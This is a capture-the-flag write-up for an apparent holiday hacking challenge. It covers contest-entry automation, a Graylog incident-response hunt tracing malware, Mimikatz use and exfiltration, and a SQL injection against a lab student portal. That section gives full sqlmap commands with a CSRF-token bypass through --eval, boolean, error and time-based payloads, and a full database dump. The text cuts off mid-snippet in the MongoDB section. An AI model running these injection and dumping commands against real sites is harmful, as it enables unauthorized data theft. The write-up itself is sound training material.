eb340938-e584-11e9-97c1-309c23aaf0ac,f65753ba-e584-11e9-97c1-309c23aaf0ac,febce1f4-e584-11e9-97c1-309c23aaf0ac,0afbf9b3-e585-11e9-97c1-309c23aaf0ac,28e82970-e585-11e9-97c1-309c23aaf0ac,3fa212e1-e585-11e9-97c1-309c23aaf0ac,2a203742-e585-11e9-97c1-309c23aaf0ac,2ea2c11d-e585-11e9-97c1-309c23aaf0ac,6cf0510f-e585-11e9-97c1-309c23aaf0ac,55b088d2-e585-11e9-97c1-309c23aaf0ac,70008436-e585-11e9-97c1-309c23aaf0ac,eba9bb03-e585-11e9-97c1-309c23aaf0ac,68da7027-e586-11e9-97c1-309c23aaf0ac,800055c9-e586-11e9-97c1-309c23aaf0ac,8c5b9f99-e586-11e9-97c1-309c23aaf0ac,6a75eb24-e586-11e9-97c1-309c23aaf0ac,8322d1e1-e586-11e9-97c1-309c23aaf0ac,05afa05c-e587-11e9-97c1-309c23aaf0ac,be7b70b6-e587-11e9-97c1-309c23aaf0ac,bf68b786-e587-11e9-97c1-309c23aaf0ac,16cca208-e588-11e9-97c1-309c23aaf0ac,127459d6-e588-11e9-97c1-309c23aaf0ac
--------------------
Server Response:
--------------------
Timed Out!
Failed! Threads: 10
Processing Images...
Waiting For Threads to Finish...
CAPTEHA Solved!
Submitting lots of entries until we win the contest! Entry #1
{"data":"<h2 id=\"result_header\">Thank you for submitting your 1st entry to the Continuous Cookie Contest! We will be selecting one lucky winner every minute! Winners receive an email so keep watching your email's inbox incase you won! You can resubmit new entries by refreshing the page and re-filling out the form. <br><br> Good luck and Happy Holidays!</h2>","request":true}

---snip---

Submitting lots of entries until we win the contest! Entry #102
{"data":"<h2 id=\"result_header\"> Entries for email address [REDACTED] no longer accepted as our systems show your email was already randomly selected as a winner! Go check your email to get your winning code. Please allow up to 3-5 minutes for the email to arrive in your inbox or check your spam filter settings. <br><br> Congratulations and Happy Holidays!</h2>","request":true}

After some time, we see that we won the contest. If you go to your email, you should see the code!

With that, we can navigate to the eighth objective in our badge and enter “8la8LiZEwvyZr2WO” to complete the objective.

Upon completing the objective, we can talk to Krampus again to learn more about a nasty plot to destroy the holidays… again…

Also, after talking with Krampus, we now get access to the Steam Tunnels, which lets us fast travel through the map!

Objective 9

Graylog - CranPi

From Krampus, by using the steam tunnels, we return back to the Dorm area where we will find Pepper Minstix.

Talking to Pepper we learn that a few Elf U computers were hacked, and that Pepper has been tasked with using Graylog to perform incident response.

We are then asked by Pepper to help him fill out the incident response form. He also provides us hints on the Graylog Docs as well as Event IDs and Sysmon.

We are also provided credentials to access the Graylog server.

With that, let’s access the terminal and login. Once logged in we are presented with the following screen.

From that screen, if we mouse over the arrow in the bottom right corner, we see the “ElfU Graylog Incident Response Report” which contains the questions we need to answer to finish this terminal challenge.

Let’s start with Question #1.

So, for this question, we need to find the full-path and filename of the malicious cookie recipe downloaded by Minty after she clicked a malicious link.

To start, at the main screen, we click on the “All messages” button under the filter streams to access the search functionality.

Now we can search for the weird activity. If you read the Graylog documentation, you’ll know that we can search for user names, and even event IDs that were generated by Sysmon.

So let’s look for Minty’s account and for Sysmon Event ID 1, which indicates process creation. If this was a malicious document, then it should have spawned Command Prompt or PowerShell. Also, make sure you select “Search in all messages” from the drop down so we see everything.

I also learned that you should group each part of your search in parentheses, as it helps filter the data properly.
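
To illustrate the grouping idea, here is a small sketch that builds a Graylog-style field:value query with every clause wrapped in parentheses. The field names UserAccount and EventID and the value minty are assumptions made for this example, since the exact fields depend on how the log source was parsed. The helper functions are hypothetical too.

```python
def term(field, value):
    # Render a single field:value clause, quoting values that contain spaces.
    text = str(value)
    if any(ch.isspace() for ch in text):
        text = '"{}"'.format(text)
    return "{}:{}".format(field, text)


def all_of(*clauses):
    # Wrap every clause in parentheses and require all of them to match.
    return " AND ".join("({})".format(clause) for clause in clauses)


# Assumed field names and value; adjust to whatever the messages actually contain.
query = all_of(term("UserAccount", "minty"), term("EventID", 1))
print(query)  # (UserAccount:minty) AND (EventID:1)
```

The resulting string can then be pasted into the search bar.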

We see that we have 96 results. If we look into the first event, we should see something very interesting in the ParentProcessCommandLine variable.

We see that in the downloads folder, Minty executed a cookie recipe executable. So this wasn’t a document but a malicious exe! Oh Minty, looks like someone needs some security training!

Well with that information, we can answer the 1st question! We also get a small hint on how we could have found the malicious document using another search!

With #1 done, let’s move onto question 2!

So from the get go we learn that the malicious executable spawned some sort of command and control server, and we need to figure out what IP and port it connected to.

Should be pretty easy! What we can do is use the same query from before, but this time we will look for all events that originated from the cookie_recipe.exe process, and we will also look for Sysmon Event ID 3, which indicates that a network connection was made.

Upon running the search we should only see one event. Examining the event will give us the information we need.

Knowing this, let’s answer the second question!

Onto question #3!

Alright, this one seems to be straightforward: we just need to see what kind of command was executed from the executable.

We can reuse our old search query, but this time we will remove the event ID and search for any events that have the cookie_recipe.exe file as the ParentProcessImage, because, remember, commands executed by it will spawn either cmd.exe or powershell.exe.

Once we have our events, we sort by oldest time first to find the first command executed. If we do some digging, we will find the third event shows the command executed by the attacker.

Knowing this, let’s answer the third question!

Onto question #4! We are on fire!

Alright, so for this one it seems the attacker escalated privileges, and we need to figure out the service used. Service? Hmm… this sounds like an exploit to me.

If we keep looking though the commands executed by the attacker, we will see that they downloaded a new binary called cookie_recipe2.exe.

If we look a little further into the events, we will see that the attacker used webexservice to execute the binary.

Doing some Googling, we find that this matches the WebExec exploit, also known as CVE-2018-15442. This exploit abuses a Windows service called WebExService that can execute arbitrary commands with SYSTEM-level privileges. Due to poor ACLs, any local or domain user can start the process over Windows’ remote service interface.

If we look at cookie_recipe2.exe for network connections, we can confirm that this was the exploit used to escalate privileges, as the user privileges returned for this connection were those of NT AUTHORITY\SYSTEM.

With that, let’s answer the question!

Onto question #5!

Alright, so for the next question we need to figure out what binary the attacker used to dump credentials. I already have a really good guess, but let’s look for it.

Since we know that the cookie_recipe2.exe binary was running as System, let’s use that and search for events that have that binary as their ParentProcessImage.

Looking through the events, and around the same time frame the connection was made as System - around 5:41 - we can see the attacker downloaded Mimikatz and saved it as cookie.exe.

4 minutes later, we can see the attacker executing mimikatz.

With that confirmation, let’s answer the question!

Easy! Now onto question #6!

So it seems that the attacker successfully dumped passwords from the system and pivoted to another machine with those credentials.

If we look at all our previous events, we see the source of all events is elfu-res-wks1, which seems to be Minty’s machine. So what we can do is search for all events with that source, and also look for Event ID 4624, which is generated when a logon session is created on the machine.

After digging through the first few events, we will see the following event with a new Account Name.

Okay, it seems Alabaster’s account was compromised. So with that, let’s answer the question!

Perfect! Now onto question #7!

For this question we need to figure out the time, in HH:MM:SS format, at which the attacker made an RDP connection to another machine.

What we need to do is look at logon types. Event ID 4624 indicates a successful logon, but it also contains the logon type, which tells us HOW the user logged onto the system.

Looking into the Logon Type table, we will see the following.

Right away, we see that Logon Type 10 is for Remote Desktop. So let’s search for all events with that type.
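
For quick reference while reading 4624 events, the logon types can be kept in a small lookup table. This is a sketch based on the commonly documented values for Event ID 4624. The describe_logon helper is a hypothetical name, and the table should be checked against Microsoft's documentation before relying on it.

```python
# Commonly documented logon types for Windows Security Event ID 4624.
LOGON_TYPES = {
    2: "Interactive",
    3: "Network",
    4: "Batch",
    5: "Service",
    7: "Unlock",
    8: "NetworkCleartext",
    9: "NewCredentials",
    10: "RemoteInteractive",  # Remote Desktop / Terminal Services
    11: "CachedInteractive",
}


def describe_logon(logon_type):
    # Log fields often arrive as strings, so normalise to int first.
    return LOGON_TYPES.get(int(logon_type), "Unknown")


print(describe_logon(10))
print(describe_logon("3"))
```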

If we take a look into the first event, we will see Alabaster making an RDP connection to elfu-res-wks2 at 06:04:28.

With that information, let’s answer our question!

Oh yeah, we’re doing great! Onto question #8!

Okay, so it seems that from elfu-res-wks2 the attacker used Alabaster’s account to navigate the file system of a third host using the RDP connection. We need to figure out the source host name, the destination host name, and the logon type.

Well, if we look back at the Logon Type table, we will see that logon type 3 is a network logon (e.g., a connection to a shared folder). All we need to do is search for Logon Type 3 with the source IP of the machine we are RDP’d into.

If we look at the first event, we will see a new source name of elfu-res-wks3, which should help us answer our question!

Awesome, so we got that one! Onto question #9!

We’re nearing the end of this challenge, finally! For this incident question we need to figure out the full path name and filename of the secret research document that was transferred from the third host.

We can simply look for this by searching for all events with the source of elfu-res-wks2 - which was the system the attacker was RDP’d into - and look for any ParentProcessImage that contained Explorer.exe, which is what Windows uses to house all application windows.

After executing that search, we see only 1 event and can see that the attacker uploaded a file called super_secret_elfu_research.pdf to pastebin!

Awesome, so we have our answer to this question.

Last question!

For this one we simply need the IPv4 address of where the document was exfiltrated to. We know that it was uploaded to pastebin.com so let’s look for that in the DestinationHostName variable.

Upon entering the IP of 104.22.3.84 into our question, we complete the challenge!

Retrieve Scraps of Paper from Server

Upon successfully completing the Graylog terminal, we can talk to Pepper again for more hints that will allow us to complete the next objective.

For this challenge we need to gain access to the data on the Student Portal server and retrieve the paper scraps hosted there.

Pepper also gives us hints on Sqlmap Tamper Scripts and SQL Injection from OWASP, so instantly we know this is a SQL injection challenge.

Upon accessing the Student Portal, we are presented with the following page.

After navigating around the page, we see a “Check Application Status” page that accepts an email. Since we got SQL hints, let’s try entering a valid email with a single quote to see if we get an error.

For this case, I enter test'@test.com and press “CHECK STATUS”. Upon sending the request, we get the following response.

Awesome, so it seems we found our SQL injection point! So let’s redo this request, but this time let’s capture it in Burp Suite.

Right away after capturing the request we notice something odd. Take a look at the token parameter in the URL: this seems to be a CSRF token!

This can pose some issues for us if we attempt to use a tool like sqlmap, since if the token expires, the tool won’t work as all pages will return an error code.

Alright, well let’s see if we can figure out how this CSRF token is generated. If we look into the check.php source code in the browser, we notice an interesting URL.

If we navigate to that URL, we will notice that a new CSRF token is generated for us!

Okay awesome, now that we have a valid URL that generates the CSRF tokens for us, we can use sqlmap along with its --csrf-token and --csrf-url options to fetch a new token for each request.

Note: You can read more on these options on the sqlmap wiki.

Our command should look like the following:

root@kali:~/HH# sqlmap -u "https://studentportal.elfu.org/application-check.php?elfmail=test%27%40test.com&token=MTAwOTg3ODQwMTI4MTU3NzkzNTAwMjEwMDk4Nzg0MC4xMjg%3D_MTI5MjY0NDM1MzYzODQzMjMxNjEwODg0LjA5Ng%3D%3D" --csrf-token=token --csrf-url="https://studentportal.elfu.org/validator.php" --dbms=mysql --level=3 --risk=3
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:38:21 /2020-01-01/

[22:38:22] [INFO] testing connection to the target URL
[22:38:22] [CRITICAL] anti-CSRF token 'token' can't be found at 'https://studentportal.elfu.org/validator.php'

Right away we see that there is an issue with the token parameter as it can’t be found.

After a few trial and error attempts, I opted to use sqlmap’s --eval option, which can be used to evaluate custom Python code before each request is sent.

So, what we can do is write a custom Python snippet that will get the CSRF token from the URL and place it in the token parameter.

First, let’s test to see if we can read the CSRF token using Python.

root@kali:~/HH# python3
Python 3.6.8 (default, Jan  3 2019, 03:42:36) 
[GCC 8.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import urllib.request
>>> page = urllib.request.urlopen('https://studentportal.elfu.org/validator.php')
>>> print(page.read())
b'MTAwOTg3OTQ3ODQwMTU3NzkzNjY4NTEwMDk4Nzk0Ny44NA==_MTI5MjY0NTczMjM1MjAzMjMxNjE0MzMwLjg4'

Awesome, so we got that working. All that’s left to do is incorporate this code into sqlmap, and execute it! Just note that since urllib returns the response body as bytes, we decode it as UTF-8.

root@kali:~/HH# sqlmap -u "https://studentportal.elfu.org/application-check.php?elfmail=test%40test.com&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ%3D_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA%3D%3D" --eval="import urllib.request;import urllib.parse;page = urllib.request.urlopen('https://studentportal.elfu.org/validator.php');tk = (page.read()).decode('utf-8');token = tk" --dbms=mysql --level=3 --risk=3
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:48:03 /2020-01-02/
GET parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[12:48:05] [INFO] testing connection to the target URL
[12:48:05] [INFO] testing if the target URL content is stable
[12:48:05] [INFO] target URL content is stable
[12:48:05] [INFO] testing if GET parameter 'elfmail' is dynamic
[12:48:06] [WARNING] GET parameter 'elfmail' does not appear to be dynamic
[12:48:06] [INFO] heuristic (basic) test shows that GET parameter 'elfmail' might be injectable (possible DBMS: 'MySQL')
[12:48:07] [INFO] heuristic (XSS) test shows that GET parameter 'elfmail' might be vulnerable to cross-site scripting (XSS) attacks
[12:48:07] [INFO] testing for SQL injection on GET parameter 'elfmail'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] n
---snip---
GET parameter 'elfmail' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 312 HTTP(s) requests:
---
Parameter: elfmail (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: elfmail=test@test.com' OR NOT 4006=4006-- LbnX&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ=_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA==

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: elfmail=test@test.com' OR (SELECT 3470 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(3470=3470,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- KGEd&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ=_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA==

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: elfmail=test@test.com' AND (SELECT 9908 FROM (SELECT(SLEEP(5)))ePeY)-- LstD&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ=_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA==
---
[12:52:56] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[12:52:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/studentportal.elfu.org'

[*] ending @ 12:52:56 /2020-01-02/
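
For readers who want to see the --eval one-liner spelled out, the sketch below does roughly the same thing outside of sqlmap: fetch a fresh token from validator.php and put it into the token parameter of the target URL. The function names and the offline fake opener are my own additions for illustration, and this is not how sqlmap itself is implemented.

```python
import io
import urllib.parse
import urllib.request

VALIDATOR_URL = "https://studentportal.elfu.org/validator.php"


def fetch_token(url=VALIDATOR_URL, opener=urllib.request.urlopen):
    # The response body is bytes, so decode it before using it as a string.
    with opener(url) as page:
        return page.read().decode("utf-8").strip()


def with_fresh_token(target_url, token):
    # Replace (or add) the token query parameter and re-encode the URL.
    parts = urllib.parse.urlsplit(target_url)
    params = dict(urllib.parse.parse_qsl(parts.query, keep_blank_values=True))
    params["token"] = token
    return urllib.parse.urlunsplit(parts._replace(query=urllib.parse.urlencode(params)))


# Offline demonstration: a fake opener stands in for the real HTTP request.
fake_opener = lambda url: io.BytesIO(b"FRESH_TOKEN==")
token = fetch_token(opener=fake_opener)
fresh_url = with_fresh_token(
    "https://studentportal.elfu.org/application-check.php?elfmail=test%40test.com&token=OLD",
    token,
)
print(fresh_url)
```

Calling fetch_token() with no arguments would perform the real request, just like the interpreter session earlier.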

After some time, we see that the email field is indeed vulnerable and we can exploit it! Now we need to access the data on the server, or in this case the “paper scraps” that are hosted there.

Let’s see all the data stored in the SQL database by using the --dump-all option.

root@kali:~/HH# sqlmap -u "https://studentportal.elfu.org/application-check.php?elfmail=test%40test.com&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ%3D_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA%3D%3D" --eval="import urllib.request;import urllib.parse;page = urllib.request.urlopen('https://studentportal.elfu.org/validator.php');tk = (page.read()).decode('utf-8');token = tk" --dbms=mysql --level=3 --risk=3 --dump-all
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.12#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:59:04 /2020-01-02/

GET parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[12:59:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: elfmail (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: [email protected]' OR NOT 4006=4006-- LbnX&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ=_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA==

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: [email protected]' OR (SELECT 3470 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(3470=3470,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- KGEd&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ=_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA==

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 9908 FROM (SELECT(SLEEP(5)))ePeY)-- LstD&token=MTAwOTkxMTQ2MzA0MTU3Nzk4NjY2MTEwMDk5MTE0Ni4zMDQ=_MTI5MjY4NjY3MjY5MTIzMjMxNzE2NjgxLjcyOA==
---
[12:59:06] [INFO] testing MySQL
[12:59:06] [INFO] confirming MySQL
[12:59:07] [WARNING] reflective value(s) found and filtering out
[12:59:07] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[12:59:07] [INFO] sqlmap will dump entries of all tables from all databases now

Database: elfu
Table: students
[9 entries]
+----+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+----------------------------+----------------+
| id | bio                                                                                                                                                                                                                                                                                                          | name               | degree                     | student_number |
+----+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+----------------------------+----------------+
| 1  | My goal is to be a happy elf!                                                                                                                                                                                                                                                                                | Elfie              | Raindeer Husbandry         | 392363902026   |
| 2  | I'm just a elf. Yes, I'm only a elf. And I'm sitting here on Santa's sleigh, it's a long, long journey To the christmas tree. It's a long, long wait while I'm tinkering in the factory. But I know I'll be making kids smile on the holiday... At least I hope and pray that I will But today. I'm still ju | Elferson           | Dreamineering              | 39210852026    |
| 3  | Have you seen my list??? It is pretty high tech!                                                                                                                                                                                                                                                             | Alabaster Snowball | Geospatial Intelligence    | 392363902026   |
| 4  | I am an engineer and the inventor of Santa's magic toy-making machine.                                                                                                                                                                                                                                       | Bushy Evergreen    | Composites and Engineering | 392363902026   |
| 5  | My goal is to be a happy elf!                                                                                                                                                                                                                                                                                | Wunorse Openslae   | Toy Design                 | 39236372526    |
| 6  | My goal is to be a happy elf!                                                                                                                                                                                                                                                                                | Bushy Evergreen    | Present Wrapping           | 392363128026   |
| 7  | Check out my makeshift armour made of kitchen pots and pans!!!                                                                                                                                                                                                                                               | Pepper Minstix     | Reindeer Husbandry         | 392363902026   |
| 8  | My goal is to be a happy elf!                                                                                                                                                                                                                                                                                | Sugarplum Mary     | Present Wrapping           | 5682168522137  |
| 9  | Santa and I are besties for life!!!                                                                                                                                                                                                                                                                          | Shinny Upatree     | Holiday Cheer              | 228755779218   |
+----+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+----------------------------+----------------+

Database: elfu
Table: krampus
[6 entries]
+----+-----------------------+
| id | path                  |
+----+-----------------------+
| 1  | /krampus/0f5f510e.png |
| 2  | /krampus/1cc7e121.png |
| 3  | /krampus/439f15e6.png |
| 4  | /krampus/667d6896.png |
| 5  | /krampus/adb798ca.png |
| 6  | /krampus/ba417715.png |
+----+-----------------------+

Right away we see a table called krampus, which stores the paths to six images. If we browse to one of the images, we notice that it’s a paper scrap!

So, let’s grab all the images and download them. Once that’s done, we can use Photoshop to combine the images, and we are presented with the following image.
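If you would rather script the download than click through six links, a minimal sketch could look like the one below. It assumes the images are served from the same host that sqlmap targeted (the dump only gives us the paths), and the helper names build_urls and download_all are my own, not part of any tool used here.

```python
from pathlib import Path
from urllib.parse import urljoin
from urllib.request import urlopen

# Assumption: the scraps live on the same host as the vulnerable page.
BASE_URL = "https://studentportal.elfu.org"

# Paths copied from the krampus table in the dump.
KRAMPUS_PATHS = [
    "/krampus/0f5f510e.png",
    "/krampus/1cc7e121.png",
    "/krampus/439f15e6.png",
    "/krampus/667d6896.png",
    "/krampus/adb798ca.png",
    "/krampus/ba417715.png",
]


def build_urls(base, paths):
    """Join each table path onto the base URL."""
    return [urljoin(base, path) for path in paths]


def download_all(urls, out_dir="scraps"):
    """Fetch every URL and save it in out_dir under its original file name."""
    target = Path(out_dir)
    target.mkdir(exist_ok=True)
    for url in urls:
        name = url.rsplit("/", 1)[-1]
        with urlopen(url) as response:
            (target / name).write_bytes(response.read())


urls = build_urls(BASE_URL, KRAMPUS_PATHS)
# download_all(urls)  # uncomment to actually fetch the images
```

The download call is left commented out so the snippet can be read and run without touching the network.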

After reading the letter we learn that Santa’s cutting-edge sleigh guidance system is called Super Sled-o-matic.

Once we know this, we can then navigate to the ninth objective in our badge and enter Super Sled-o-matic to complete the objective!

Objective 10

Mongo Pilfer - CranPi

From Pepper in the Dorm area, we return back to Hermey Hall and enter the NetWars room where we will find Holly Evergreen!

Upon talking with Holly, we learn that her teacher has been locked out of the quiz database, and we need to gain access to the database so quizzes can be graded.

We also learn from Holly that we will need to know a little bit about Mongo, so she provides us with a hint for the MongoDB Documentation.

After reading through the documentation and familiarizing yourself with it, we can access the terminal and are presented with the following:

'...',...'::'''''''''cdc,',,,,,,,cxo;,,,,,,,,:dl;,;;:;;;;;l:;;;cx:;;:::::lKXkc::
oc;''.',coddol;''';ldxxxxoc,,,:oxkkOkdc;,;:oxOOOkdc;;;:lxO0Oxl;;;;:lxOko::::::cd
ddddocodddddddxxoxxxxxkkkkkkxkkkkOOOOOOOxkOOOOOOO00Oxk000000000xdk00000K0kllxOKK
coddddxxxo::ldxxxxxxdl:cokkkkkOkxl:lxOOOOOOOkdlok0000000Oxok00000000OkO0KKKKKKKK
'',:ldl:,'''',;ldoc;,,,,,,:oxdc;,,,;;;cdOxo:;;;;;:ok0kdc;;;;:ok00kdc:::lx0KK0xoc
oc,''''';cddl:,,,,,;cdkxl:,,,,,;lxOxo:;;;;;:ldOxl:;;:;;:ldkoc;;::;;:oxo:::ll::co
xxxdl:ldxxxxkkxocldkkkkkkkkocoxOOOOOOOkdcoxO000000kocok000000kdccdk00000ko:cdk00
oxxxxxxxxkddxkkkkkkkkkdxkkkkOOOOOOxOOOOO00OO0Ok0000000000OO0000000000O0000000000
',:oxkxoc;,,,:oxkkxo:,,,;ldkOOkdc;;;cok000Odl:;:lxO000kdc::cdO0000xoc:lxO0000koc
l;'',;,,,;lo:,,,;;,,;col:;;;c:;;;col:;;:lc;;:loc:;:co::;:oo:;;col:;:lo:::ldl:::l
kkxo:,:lxkOOOkdc;;ldOOOOOkdc;:lxO0000ko:;:oxO000Oxl::cdk0000koc::ox0KK0ko::cok0K
kkkkOkOOOOOkOOOOOOOOOOOOOOOOOO0000000000O0000000000000000000000O000KKKKKK0OKKKKK
,:lxOOOOxl:,:okOOOOkdl;:lxO0000Oxl:cdk00000Odlcok000000koclxO00000OdllxOKKKK0kol
l;,,;lc;,,;c;,,;lo:;;;cc;;;cdoc;;;l:;;:oxoc::cc:::lxxl:::l:::cdxo:::lc::ldxoc:cl
KKOd:,;cdOXXXOdc;;:okKXXKko:;;cdOXNNKxl:::lkKNNXOo:::cdONNN0xc:::oOXNN0xc::cx0NW
XXXXX0KXXXXXXXXXK0XXXXXXNNNX0KNNNNNNNNNX0XNNNNNNNNN0KNNNNNNNNNK0NNNNNNNWNKKWWWWW
:lxKXXXXXOdcokKXXXXNKkolxKNNNNNN0xldOXNNNNNXOookXNNNNWN0xokKNNNNNNKxoxKWWNWWXOod
:;,,cdxl;,;:;;;cxOdc;;::;;:dOOo:;:c:::lk0xl::cc::lx0ko:::c::cd0Odc::c::cx0ko::lc
OOxl:,,;cdk0Oxo:;;;:ok00Odl:;;:lxO00koc:::ldO00kdl:::cok0KOxl:::cok0KOxl:::lx0KK
00000kxO00000000OxO000000000kk000000000Ok0KK00KKKK0kOKKKKKKKK0kOKKKKKKKK0k0KKKKK
:cok00000OxllxO000000koldO000000Odlok0KKKKKOxoox0KKKKK0koox0KKKKK0xoox0KKKKKkdld
;:,,:oxoc;;;;;;cokdl:;;:;;coxxoc::c:::lxkdc::c:::ldkdl::cc::ldkdl::lc::lxxoc:loc
OOkdc;;;:oxOOkoc;;;:lxO0Odl:;::lxO00koc:::lxO00kdl:::lxO00Odl::cox0KKOdl:cox0KK0
OOOOOOxk00000000Oxk000000000kk000000000Ok0KK0000KK0k0KKKKKKKK0OKKKKKKKKK00KKK0KK
c:ldOOOO0Oxoldk000000koldk000000kdlox0000K0OdloxOKK0K0kdlox0KKKK0xocok0KKK0xocld
;l:;;cooc;;;c:;:lddl:;:c:::ldxl:::lc::cdxo::coc::cddl::col::cddl:codlccldlccoxdc
000Odl;;:ok000koc;;cok0K0kdl::cdk0KKOxo::ldOKKK0xoccox0KKK0kocldOKKKK0xooxOKKKKK
0000000O0000000000O0KKK0KKKK00KKKK0KKKKK0KKKK0KKKKKKKKKK0KKKKKKKKKO0KKKKKKKKOkKK
c::ldO000Oxl:cok0KKKOxl:cdk0KKKOdl:cok0KK0kdl:cok0KK0xoccldk0K0kocccldOK0kocccco
;;;;;;cxl;;;;::::okc::::::::dxc::::::::odc::::::::ol:ccllcccclcccodocccccccdkklc

Hello dear player!  Won't you please come help me get my wish!
I'm searching teacher's database, but all I find are fish!
Do all his boating trips effect some database dilution?
It should not be this hard for me to find the quiz solution!

Find the solution hidden in the MongoDB on this system.

elf@aa816f0ac957:~$

Alright, so we need to find the teacher’s database and find the quiz solution! Seems easy enough. Let’s start by opening a shell to interact with the database by using the mongo command.

elf@aa816f0ac957:~$ mongo
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27017
2020-01-22T00:49:57.905+0000 W NETWORK  [thread1] Failed to connect to 127.0.0.1:27017, in(checking socket for error after poll), reason: Connection refused
2020-01-22T00:49:57.905+0000 E QUERY    [thread1] Error: couldn't connect to server 127.0.0.1:27017, connection attempt failed :
connect@src/mongo/shell/mongo.js:251:13
@(connect):1:6
exception: connect failed


Hmm... what if Mongo isn't running on the default port?

Hmm… interesting. Right away we see that we aren’t able to connect to mongo’s default port of 27017. Well, we can easily check what port mongo is running on by executing the ps command to list all running processes on the system, along with more information such as the user running the process, the command line arguments passed to the process, etc.

elf@aa816f0ac957:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
elf          1  0.0  0.0  18508  3360 pts/0    Ss   00:45   0:00 /bin/bash
mongo        9  0.5  0.1 1018684 63392 ?       Sl   00:45   0:02 /usr/bin/mongod --quiet --fork --
elf         52  0.0  0.0  34400  2948 pts/0    R+   00:51   0:00 ps aux

Well it seems that we got a command line argument, and we see something about our mongo process, but unfortunately the text for the command is cut off!

Not to fear though! Using some Linux-fu and the awk command we can cut out just the commands, like so.

elf@aa816f0ac957:~$ ps aux | awk -v p='COMMAND' 'NR==1 {n=index($0, p); next} {print substr($0, n)}'
/bin/bash
/usr/bin/mongod --quiet --fork --port 12121 --bind_ip 127.0.0.1 --logpath=/tmp/mongo.log
/bin/bash
ps aux
awk -v p=COMMAND NR==1 {n=index($0, p); next} {print substr($0, n)}

Nice, so we now see that the mongod process is running on port 12121. With this information, we can try connecting to the database again and specify the port we want to connect to by using the --port parameter.
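If you ever need to pull the port out of a command line like this in a script, here is a small sketch. The function name mongod_port is made up for illustration, and it only handles the two spellings "--port N" and "--port=N".

```python
import shlex


def mongod_port(cmdline, default=27017):
    """Return the --port value from a mongod command line, or the default port."""
    args = shlex.split(cmdline)
    for index, arg in enumerate(args):
        # Form 1: "--port 12121" (value is the next argument)
        if arg == "--port" and index + 1 < len(args):
            return int(args[index + 1])
        # Form 2: "--port=12121"
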